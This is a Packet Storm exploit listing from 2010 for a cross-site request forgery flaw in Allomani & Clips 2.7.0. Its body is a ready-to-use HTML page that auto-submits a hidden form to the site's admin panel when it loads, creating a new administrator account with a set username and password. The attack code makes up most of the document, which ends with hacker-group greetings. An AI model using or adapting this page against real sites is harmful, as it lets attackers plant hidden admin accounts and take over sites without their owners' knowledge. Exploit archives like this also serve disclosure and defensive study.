Allomani And Clips 2.7.0 Cross Site Request Forgery

2010-06-26T00:00:00
ID PACKETSTORM:91056
Type packetstorm
Reporter G0D-F4Th3r
Modified 2010-06-26T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Allomani & Clips v2.7.0 - [CSRF] Add Admin Account  
# Date:25 -06-2010  
# Author: G0D-F4Th3r  
# Software Link: http://demos.allomani.com/songs270/  
# Version: 2.7.0  
# Tested on: http://demos.allomani.com/songs270/  
  
####################################################  
<html>  
<body onload="javascript:fireForms()">  
<form method="POST" name="form0" action="  
http://www.site.com/[path]/admin/index.php">  
<input type="hidden" name="action" value="adduserok"/>  
<input type="hidden" name="username" value="admin2"/>  
<input type="hidden" name="password" value="admin2123"/>  
<input type="hidden" name="email" value="test@test.com"/>  
<input type="hidden" name="group_id" value="1"/>  
<input type="hidden" name="useraddbutton" value="اضافة"/>  
</form>  
</body>  
</html>  
  
#########################################################################  
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My  
Friends  
#########################################################################  
  
  
  
`